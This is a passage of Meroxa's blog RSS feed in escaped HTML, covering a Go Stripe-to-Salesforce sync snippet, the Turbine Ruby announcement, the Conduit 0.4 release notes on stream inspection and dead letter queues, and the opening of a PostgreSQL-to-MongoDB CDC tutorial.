	salesforceUpdater&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;newBasicSalesforceUpdater&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;salesforceInstanceUrl&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; salesforceClientId&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; salesforceUser&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; salesforcePassword&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; salesforceToken&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		log&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Fatal&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;ERROR: salesforce updater creation failed&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; r &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;range&lt;/span&gt; rr &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		pd &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;RecordToProductData&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;r&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		subscriptionId &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;stripe_subscription_id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		subscriptionStatus&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; subscriptionFetcher&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;fetchSubscriptionStatus&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;subscriptionId&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

		&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
			&lt;span class=&quot;token keyword&quot;&gt;continue&lt;/span&gt;
		&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	  &lt;span class=&quot;token comment&quot;&gt;//update our data with information from Stripe&lt;/span&gt;
		pd&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;subscriptionStatus &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; subscriptionStatus
		err &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; salesforceUpdater&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;updateProductInstance&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;pd&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	&lt;span class=&quot;token comment&quot;&gt;// return original records unmodified&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; rr
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In the interest of space I’ve included only interesting snippets of code, but the full source files can be found &lt;a href=&quot;https://gist.github.com/simonl2002/253729256ab225d40054d656402f4d96&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We’re currently running this application in production and it has allowed us to save almost $150,000 per year by ending our use of Workato. We already have a few updates in the pipeline to give our marketing and sales teams even more data. Look for future posts where I cover any updates we roll out.&lt;/p&gt;
&lt;p&gt;Hopefully, you come away from this post with an appreciation of how Turbine data apps can solve a class of problems that almost all companies have. Let us know what you think by joining the discussion on our &lt;a href=&quot;https://discord.meroxa.com&quot;&gt;Discord channel&lt;/a&gt; or in Github discussions. We can’t wait to see what you build. Click &lt;a href=&quot;https://auth.meroxa.io/login?state=hKFo2SBNQW1WZzBfZ3dwNWR0SXl1SUJqVGd1NGJHdkJRblNxaKFupWxvZ2luo3RpZNkgRU5kdFk4NkQyamxBbXNWeUR5NzJISjF3YU5Wdld5dGyjY2lk2SBUeTJQeUxiZGFoNnBJcVJaaXEzdXhod0Exdmh2ZzZDNg&amp;#x26;client=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;protocol=oauth2&amp;#x26;response_type=code&amp;#x26;redirect_uri=https%3A%2F%2Fdashboard.meroxa.io%2Fcallback&amp;#x26;mode=signUp&amp;#x26;_ga=2.71869648.2121119041.1674066866-1538797909.1674066866&quot;&gt;here&lt;/a&gt; to get started.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Introducing Turbine Ruby]]></title><description><![CDATA[Now Ruby developers can stream Meroxa on Ruby. Meroxa is stream processing application PaaS.]]></description><link>https://meroxa.com/blog/introducing-turbine-ruby</link><guid isPermaLink="false">https://meroxa.com/blog/introducing-turbine-ruby</guid><dc:creator><![CDATA[Jennifer Hudiono]]></dc:creator><pubDate>Tue, 24 Jan 2023 17:00:40 GMT</pubDate><content:encoded>&lt;p&gt;We are excited to announce—software developers can now build Turbine data applications with Turbine Ruby. This addition expands the capabilities of our platform and allows for even greater flexibility in processing and analyzing data streams.&lt;/p&gt;
&lt;p&gt;The Turbine application framework is designed for software developers to build, test, and deploy their data streaming applications. Turbine streamlines this experience for software developers by abstracting the complexity associated with running and scaling a data application such as separate task-specific tooling, new and unfamiliar paradigms, and managing complex services. Combining Ruby’s simplicity and power with Turbine, Rubyists can now build, test, and deploy data streaming apps on Meroxa!&lt;/p&gt;
&lt;h2&gt;Turbine.rb&lt;/h2&gt;
&lt;p&gt;You can get started building your data streaming application in Ruby by creating a free &lt;a href=&quot;https://auth.meroxa.io/authorize?response_type=code&amp;#x26;client_id=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;redirect_uri=https://dashboard.meroxa.io/callback&amp;#x26;mode=signUp&quot;&gt;Meroxa account&lt;/a&gt; and downloading our &lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide/&quot;&gt;CLI&lt;/a&gt;. Set up will also require local installation of &lt;a href=&quot;https://git-scm.com/book/en/v2/Getting-Started-Installing-Git&quot;&gt;Git&lt;/a&gt;, the latest Ruby version. We also recommend downloading a Ruby version management tool of your choice.&lt;/p&gt;
&lt;p&gt;Recommended Ruby version management tools:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/rbenv/rbenv&quot;&gt;rbenv&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://rvm.io/&quot;&gt;RVM&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/asdf-vm/asdf-ruby&quot;&gt;asdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you have a Ruby version management tool installed, you can install ruby through your version management tool and specify which version you would like installed for your development use case.&lt;/p&gt;
&lt;h2&gt;Quickstart&lt;/h2&gt;
&lt;p&gt;Once setup and installation are complete, you can start building your stream processing app. Initialize the streaming app within the local directory you are currently in by running the following command:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh3.googleusercontent.com/CY9smIr8HKh34lFyIWor6TwjLa1XXHpwH_HByhUU_Yi5SwnLSBoVWyWE1-2GqXy67zoZTNnF7JmKpyLOLACxkf9fEGfakHNMsugDtEROPMg8D8yRVUCyrtVeNNSvmkBeLkm3oAedphopk_zDyWQBFlBAj6uHySFno-yGnJPZeO_8qVqvgh39gE655shO8g&quot; alt=&quot;Code snippet 1&quot;&gt;&lt;/p&gt;
&lt;p&gt;You may define a different local directory path for the app project by using &lt;code class=&quot;language-text&quot;&gt;--path /your/local/path/&lt;/code&gt; in your command.&lt;/p&gt;
&lt;p&gt;A local app project directory will automatically be created on your local machine, complete with everything you need to build a streaming app with Tubrine.rb. The app project will include the following files:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh5.googleusercontent.com/SZc-9kaNt5OU6O_P5yNubb1zxEs10TfcHU0kJ54V6SUzxSW1IrLYqfqeeHNUxslyQHWOrc-v0QoSub4Dcb078o9cv4EaByrLp62H2PIiGw5ueB_nBAB0gm9ca_kqCOu_vU4wcpVNBu8GJzy54q9NtwJ59cktPw9VikC38p5_fpezaAmOMXvy20dfRu6-KQ&quot; alt=&quot;Code snippet 2&quot;&gt;&lt;/p&gt;
&lt;p&gt;The &lt;code class=&quot;language-text&quot;&gt;app.rb&lt;/code&gt; file is the core of your streaming app. Self-documented TurbineRb boilerplate code is already written to help you get started &lt;code class=&quot;language-text&quot;&gt;at /your/local/path/yourappname/app.rb&lt;/code&gt;. All that awaits is your creativity demonstrated through code.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh4.googleusercontent.com/-1WD_FQHm0BjCVJ9cqCfc6qpxWKEq8n7Zg2ZY4Zyqhmqoy5eAhWpkCDxz0Q_3DH6g5fmI9LeLUW2N8EM8vR1jakbukvfp-MtjJnuOwKVuYolvhmdgBzL6tLvl4so7Hdw5WpciplZMtYbUoHn2PttIBRWxjYooADurUn2TEZBlDLjLOTikWWmKa2DnIN7Sg&quot; alt=&quot;Code snippet 3&quot;&gt;&lt;/p&gt;
&lt;p&gt;In the next section, we will run the example app above to test its output.&lt;/p&gt;
&lt;h2&gt;Running Your Application&lt;/h2&gt;
&lt;p&gt;You can run your app locally without changing any of the TurbineRb boilerplate code provided in the local app project directory. Simply navigate to the root of the app project using &lt;code class=&quot;language-text&quot;&gt;cd /your/local/path/yourappname&lt;/code&gt; and use &lt;code class=&quot;language-text&quot;&gt;meroxa app run&lt;/code&gt; to run your streaming app locally. Running the example app provided, will take records provided by the fixtures which contain a message and output that exact message. You can include the commented out transformations to see that transformation applied to the record.&lt;/p&gt;
&lt;p&gt;If you see the following output—Then you have successfully run a streaming app locally!&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh5.googleusercontent.com/pyaNUpc58XIL2S-nC_gszlhd9vzzDJuyCLzwFlIrlLZy3alsxN-tKrpumegDlf9Hm084JQLtK8pAN_eHqsIc7fTIeReMZt4olUkGGpUWw9hMhMf2kMUuEqgVl-ibjSLsmX7OTOtRHLRoREK8m5ax_w5XgGZ6qfSWxcLzN0aX-vEOImJLC130WHQnJmNqAg&quot; alt=&quot;Code snippet 4&quot;&gt;&lt;/p&gt;
&lt;h2&gt;Deploying Your Application&lt;/h2&gt;
&lt;p&gt;Before deploying your application, ensure the resources used by your Turbine data app exist on the Meroxa Platform. You can check using the Meroxa &lt;a href=&quot;https://dashboard.meroxa.io/resources&quot;&gt;Dashboard&lt;/a&gt; or CLI by running the &lt;code class=&quot;language-text&quot;&gt;meroxa resources list command&lt;/code&gt; --this command lists all resources and their state. If the resources don&apos;t exist, you must configure your resources using the Meroxa &lt;a href=&quot;https://dashboard.meroxa.io/resources/new&quot;&gt;Dashboard.&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The Turbine framework uses git for version control. Upon initializing your application, git init is performed locally on your behalf. This creates a new repository in the project folder of your Turbine data app, which can be used to track your code. You will need to commit your code changes before deploying.&lt;/p&gt;
&lt;p&gt;Using the Meroxa CLI, run the &lt;code class=&quot;language-text&quot;&gt;meroxa app deploy&lt;/code&gt; command in the project folder root of your Turbine data app, this will start the process of deployment. The Meroxa CLI will print out the steps taken and confirm once deployment is successful.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh5.googleusercontent.com/Ki3kJ2HeNTtPfVPM2slnX7Hn2XviVBDRbsZdH7PB9Y0vLaZdSUnKnM9KtjyIcpr03-YftuHdke29WfuypRCYYXTxLEzgelFwq8Ci7GvMlszp55NP9dlTTt9Wo90-Ol9RtxCV0XsZ1DgLYBVvknJBFDD3sBQERv_tPzUV9D4jhmgi7O4oGfKB9K-aEMdQfQ&quot; alt=&quot;Code snippet 5&quot;&gt;&lt;/p&gt;
&lt;p&gt;For a more detailed walkthrough of creating a Turbine Ruby application, refer to our &lt;a href=&quot;https://docs.meroxa.com/turbine/ruby/setup&quot;&gt;documentation&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Have questions or feedback?&lt;/h2&gt;
&lt;p&gt;We love hearing from our customers! If you have questions or feedback, please feel free to contact us directly at &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt; or by &lt;a href=&quot;http://discord.meroxa.com&quot;&gt;joining our Discord community server&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;🚀 We can’t wait to see what you build!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Conduit 0.4]]></title><description><![CDATA[Conduit is a tool to help developers build streaming data pipelines between production data stores and messaging systems.]]></description><link>https://meroxa.com/blog/conduit-0.4</link><guid isPermaLink="false">https://meroxa.com/blog/conduit-0.4</guid><dc:creator><![CDATA[Rimas Silkaitis]]></dc:creator><pubDate>Thu, 15 Dec 2022 17:11:04 GMT</pubDate><content:encoded>&lt;p&gt;Conduit 0.4 is out! Conduit’s a tool to help developers build streaming data pipelines between production data stores and messaging systems. For example, if you’ve ever used tools like Kafka Connect, Conduit can be used as a drop-in replacement to help stream data to Apache Kafka. With this release the theme was error handling and debugging. Here’s a look at some of the more interesting features as part of this &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.4.0&quot;&gt;release&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Stream Inspector&lt;/h2&gt;
&lt;p&gt;Building data pipelines is more difficult than, say, building a web application. In web applications, the developer is in control of the user inputs and the data coming into the system. With data pipelines and data applications, the system has to respond to whatever data is given to it. This means schemas and associated data may change over time and the system has to be able to handle it. In these situations, being able to see what the data looks like throughout the Conduit pipeline is critical to being able to debug what’s happening.&lt;/p&gt;
&lt;p&gt;In this release, developers will now be able to peek at the data as it enters Conduit via source connectors and what the data looks like as it travels to destination connectors. The ability to peek at data as it enters or leaves processors will be coming in a future release. Keep in mind that this feature is about sampling data as it passes through the pipeline not tailing the pipeline.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ wscat &lt;span class=&quot;token parameter variable&quot;&gt;-c&lt;/span&gt; ws://localhost:8080/v1/connectors/pipeline1:destination1/inspect &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; jq &lt;span class=&quot;token builtin class-name&quot;&gt;.&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token string&quot;&gt;&quot;result&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token string&quot;&gt;&quot;position&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;NGVmNTFhMzUtMzUwMi00M2VjLWE2YjEtMzdkMDllZjRlY2U1&quot;&lt;/span&gt;,
    &lt;span class=&quot;token string&quot;&gt;&quot;operation&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;OPERATION_CREATE&quot;&lt;/span&gt;,
    &lt;span class=&quot;token string&quot;&gt;&quot;metadata&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token string&quot;&gt;&quot;opencdc.readAt&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;1669886131666337227&quot;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;,
    &lt;span class=&quot;token string&quot;&gt;&quot;key&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token string&quot;&gt;&quot;rawData&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;NzQwYjUyYzQtOTNhOS00MTkzLTkzMmQtN2Q0OWI3NWY5YzQ3&quot;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;,
    &lt;span class=&quot;token string&quot;&gt;&quot;payload&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token string&quot;&gt;&quot;before&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token string&quot;&gt;&quot;rawData&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&quot;&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;,
      &lt;span class=&quot;token string&quot;&gt;&quot;after&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token string&quot;&gt;&quot;structuredData&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
          &lt;span class=&quot;token string&quot;&gt;&quot;company&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;string 1d4398e3-21cf-41e0-9134-3fe012e6d1fb&quot;&lt;/span&gt;,
          &lt;span class=&quot;token string&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1534737621&lt;/span&gt;,
          &lt;span class=&quot;token string&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;string fbc664fa-fdf2-4c5a-b656-d52cbddab671&quot;&lt;/span&gt;,
          &lt;span class=&quot;token string&quot;&gt;&quot;trial&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;true&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Stream inspection is available via the Conduit API and Dashboard.&lt;/p&gt;
&lt;h2&gt;Dead Letter Queues&lt;/h2&gt;
&lt;p&gt;Continuing the theme of failures throughout a data pipeline, what should happen with the data if it’s failed to be processed? Dead Letter Queues are one such way. Let’s assume that if a message does have an error in it, in Conduit 0.4, you now have the option of sending the message to another connector to be saved. What you do with that message is up to you. For example, you could choose to create another Conduit pipeline to reprocess once you’ve figured out the root cause.&lt;/p&gt;
&lt;p&gt;To get started with a Dead Letter Queue, you have to specify that you want one as part of your pipeline in the Conduit Pipeline Configuration File:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1.1&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;pipelines:dlq-example-pipeline&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
	&lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    	&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;...&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;dead-letter-queue&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    	&lt;span class=&quot;token comment&quot;&gt;# disable stop window&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;window-size&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;
        
        &lt;span class=&quot;token comment&quot;&gt;# the next 3 lines explicitly define the log plugin&lt;/span&gt;
        &lt;span class=&quot;token comment&quot;&gt;# removing this wouldn&apos;t change the behavior, it&apos;s the default DLQ config&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;log
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        	&lt;span class=&quot;token key atrule&quot;&gt;level&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; WARN&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Dead Letter Queues can only be created by using the Pipeline Configuration file. In future releases, we plan to make this functionality available via Conduit’s API.&lt;/p&gt;
&lt;h2&gt;Connector Parameter Validation&lt;/h2&gt;
&lt;p&gt;Conduit connectors can require any number of parameters and data types to be able to successfully connect to a variety of data stores. In this release, Conduit connector developers can now encode the required parameters in their connectors and Conduit will surface the correct error messages to the end users. This is huge because this should help provide consistent messages and make the connector setup process easier.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Connector%20Parameter%20Validation%20image.png&quot; alt=&quot;Connector Parameter Validation image&quot;&gt;&lt;/p&gt;
&lt;h2&gt;And the rest&lt;/h2&gt;
&lt;p&gt;If you want to see the full list of what was included in this release, check out the &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.4.0&quot;&gt;Conduit Changelog&lt;/a&gt; and the &lt;a href=&quot;https://docs.conduit.io/docs/introduction/getting-started/&quot;&gt;documentation&lt;/a&gt;. Also, feel free to join us on &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt; or &lt;a href=&quot;https://twitter.com/conduitio&quot;&gt;Twitter&lt;/a&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Sync, Transform, & Migrate data in Real-Time from PostgreSQL to MongoDB w/ Meroxa]]></title><description><![CDATA[Real-time data sync, transformation & migration from PostgreSQL to MongoDB using Meroxa with Change Data Capture (CDC).]]></description><link>https://meroxa.com/blog/sync-transform-migrate-data-in-real-time-from-postgresql-to-mongodb-w/-meroxa</link><guid isPermaLink="false">https://meroxa.com/blog/sync-transform-migrate-data-in-real-time-from-postgresql-to-mongodb-w/-meroxa</guid><dc:creator><![CDATA[Tanveet Gill]]></dc:creator><pubDate>Tue, 13 Dec 2022 23:23:20 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;Video Tutorial (1 minute)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Github Repo:&lt;/strong&gt;&lt;a href=&quot;https://github.com/meroxa/turbine-examples/tree/main/javascript/users-demo&quot;&gt;meroxa/turbine-examples/javascript/user-demo/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;💡 To see how to move data out of Mongo to any data destination, check out our blog post here: &lt;a href=&quot;https://meroxa.com/blog/streaming-changes-in-real-time-from-mongodb-to-apache-kafka&quot;&gt;https://meroxa.com/blog/streaming-changes-in-real-time-from-mongodb-to-apache-kafka&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;This blog covers using MongoDB as a downstream source. We will be moving data in real-time from PostgreSQL to MongoDB. Meroxa will keep track of any changes in your PostgreSQL database and post those CREATE, UPDATE or DELETE operations in MongoDB, keeping both in Sync.&lt;/p&gt;
&lt;p&gt;Migrating data from PostgreSQL to MongoDB or vice versa can be a time-consuming process. With Meroxa you can do this in just a few lines of code. In this blog post we will be keeping our PostgreSQL database in sync with our MongoDB Atlas instance. In addition, we will briefly go over how you can transform the data going into MongoDB in real-time.&lt;/p&gt;
&lt;p&gt;While this post covers getting data into Mongo, we can also pull data out of Mongo to &lt;strong&gt;any data destination&lt;/strong&gt; by doing the opposite of what&apos;s covered in this post (&lt;a href=&quot;https://meroxa.com/blog/streaming-changes-in-real-time-from-mongodb-to-apache-kafka&quot;&gt;Here’s a blog post on moving data from MongoDB to Apache Kafka in real-time&lt;/a&gt;).&lt;/p&gt;
&lt;h2&gt;What is Meroxa?&lt;/h2&gt;
&lt;p&gt;Meroxa is a streaming application platform where developers can run their Turbine applications. Meroxa handles the underlying streaming infrastructure so that developers can focus on building their applications. Turbine applications start with an upstream resource. Once that upstream resource is connected, Meroxa will handle streaming the data into the Turbine application for execution.&lt;/p&gt;
&lt;h2&gt;What is Turbine?&lt;/h2&gt;
&lt;p&gt;Turbine is a stream processing application framework for building event-driven data apps that respond to data in real-time and scale using cloud-native best practices. No bespoke domain-specific language (DSL).&lt;/p&gt;
&lt;p&gt;You can even see how your app reacts to data by running your Turbine data applications locally—we show you exactly what will happen in Production, with faster iteration and development without having to deploy.&lt;/p&gt;
&lt;p&gt;You can write your Turbine data apps using &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/go&quot;&gt;&lt;strong&gt;Go&lt;/strong&gt;&lt;/a&gt;, &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/javascript&quot;&gt;&lt;strong&gt;Javascript&lt;/strong&gt;&lt;/a&gt;, &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/python&quot;&gt;&lt;strong&gt;Python&lt;/strong&gt;&lt;/a&gt;, or &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/ruby&quot;&gt;Ruby&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;💡 If you prefer to use another language, Meroxa has support for many more languages coming, reach out directly to suggest a language by joining our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;community&lt;/a&gt; or by writing to &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;How it works&lt;/h2&gt;
&lt;p&gt;In this example, the Turbine app will create a CDC (Change Data Capture) connector from the platform to a PostgreSQL database (can be any database) and then writes that data to MongoDB Atlas.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Flowcharts%20(1).png&quot; alt=&quot;Flowcharts (1)&quot;&gt;&lt;/p&gt;
&lt;p&gt;Here&apos;s what happens and what we can do to stream and transform our data:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The PostgreSQL connector receives changes in real-time and publishes them in the form of a stream.&lt;/li&gt;
&lt;li&gt;Inside our Turbine app we can write functions to transform and manipulate that data. We can do anything we would generally do with any programming language such as calling APIs or importing packages and libraries and change that data.&lt;/li&gt;
